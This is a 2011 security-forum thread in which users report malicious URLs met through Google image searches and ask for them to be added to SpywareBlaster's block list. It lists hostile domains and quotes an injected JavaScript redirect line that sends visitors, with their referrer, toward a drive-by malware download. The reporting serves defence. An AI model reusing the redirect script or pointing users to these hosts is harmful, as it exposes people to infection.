New bad link submission.

Discussion in 'SpywareBlaster & Other Forum' started by unclebic, Apr 7, 2011.

Thread Status:
Not open for further replies.
  1. unclebic

    unclebic Registered Member

    Joined:
    Oct 15, 2008
    Posts:
    2
    I found this one trolling around looking at a google image search, go figure. I did report the link on their search, and wanted to add it to the list for Spyware Blaster.

    The links below would have gotten me if not for SpySweeper and I knew to kill Firefox with the Task Manager. Trying to restart Firefox was a bit of a pain since it now seems to automatically restore all pages without asking the first time. The next time, it did bring up the dialog page with the pages to restore or not. It was pretty easy to figure which page was up to no good.

    Don't click or open the links below.

    "antispyware-infection.co.cc/fast-scan"

    "pgxyyyoq.cw.cm/in.cgi?2&seoref=http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2F1.bp.blogspot.com%2F_yNwrvgG4JbM%2FSVk2wfBYreI%2FAAAAAAAAAbs%2F3Hj0ogl2GgA%2Fs320%2Fodette.jpg%26imgrefurl%3Dhttp%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%2526page%253D3%26usg%3D__ENyYpL7WFgu7ps1Dr9CFEW-m5Rc%3D%26h%3D320%26w%3D246%26sz%3D20%26hl%3Den%26start%3D0%26sig2%3DsBHzpbuuzruowdgDiYgQdA%26zoom%3D1%26tbnid%3DT7VnTzL3HD4HMM%3A%26tbnh%3D125%26tbnw%3D97%26ei%3De3OdTbWBBaTy0gGF1pHABA%26prev%3D%2Fsearch%253Fq%253DOdette%252BAnnable%2526hl%253Den%2526newwindow%253D1%2526safe%253Doff%2526client%253Dfirefox-a%2526hs%253DGdQ%2526sa%253DX%2526rlz%253D1R1GGGL_en___US357%2526biw%253D1920%2526bih%253D946%2526tbm%253Disch%2526prmd%253Divnsuo0%252C114%26itbs%3D1%26iact%3Dhc%26vpx%3D226%26vpy%3D228%26dur%3D3234%26hovh%3D256%26hovw%3D196%26tx%3D137%26ty%3D136%26oei%3De3OdTbWBBaTy0gGF1pHABA%26page%3D1%26ndsp%3D82%26ved%3D1t%3A429%2Cr%3A29%2Cs%3A0%26biw%3D1920%26bih%3D946&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%26page%3D3&default_keyword=default"
     
  2. ZenoK

    ZenoK Registered Member

    Joined:
    Apr 7, 2011
    Posts:
    2
    I just came across to this bad link. Fortunately my antivirus catched id and privoxy logged its behaviour.

    I found it also by searching an image on Google Map, an

    The image was linked on
    bank.owned-properties.info, which appears to be involved or at least compromised (contacts link are dead).
    The images is located on
    bank-owned-properties.info/45.php

    This is a script that makes a redirect to pgxyyyoq.cw.cm, passing also the referer URL.
    <script>var url = "http://pgxyyyoq.cw.cm/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";

    That then redirect to sexgoogle.info/TF19 which contains one of those infamous obscured javascript codes

    The code then tries to load some Java Applet that should install Crypt.XPACK.Gen.

    If I try to call the pgxyyoq script without parameters I land on wolandtraffic.com

    To summarize I would consider all the following links as hostile:
    pgxyyyoq.cw.cm
    sexgoogle.info

    These one as suspects:
    bank-owned-properties.info
    wolandtraffic.com
     
    Last edited: Apr 7, 2011
  3. ZenoK

    ZenoK Registered Member

    Joined:
    Apr 7, 2011
    Posts:
    2
    and some more mirrors of the same stuff.

    Always while searching for "gasometer wien" in google image, I got attempts to infect from:

    rwjhlqjg.cw.cm/

    Added .cw.cm in the block list

    The compromised site used for the attack is: hariyoanaklaut.com
     
    Last edited: Apr 7, 2011
  4. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    Hi,

    Many thanks for the submissions & information. We'll take a look. :)

    Best regards,

    -Javacool
     
  5. MikeBCda

    MikeBCda Registered Member

    Joined:
    Jan 5, 2004
    Posts:
    1,627
    Location:
    southern Ont. Canada
    Is it a safe bet that this was at least partly behind the unusual number of restricted-site additions in the most recent def updates?
     
  6. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    The Restricted Sites additions in the 4/10/2011 update were actually related to the Lizamoon SQL injection attack that infected numerous websites.
     
Thread Status:
Not open for further replies.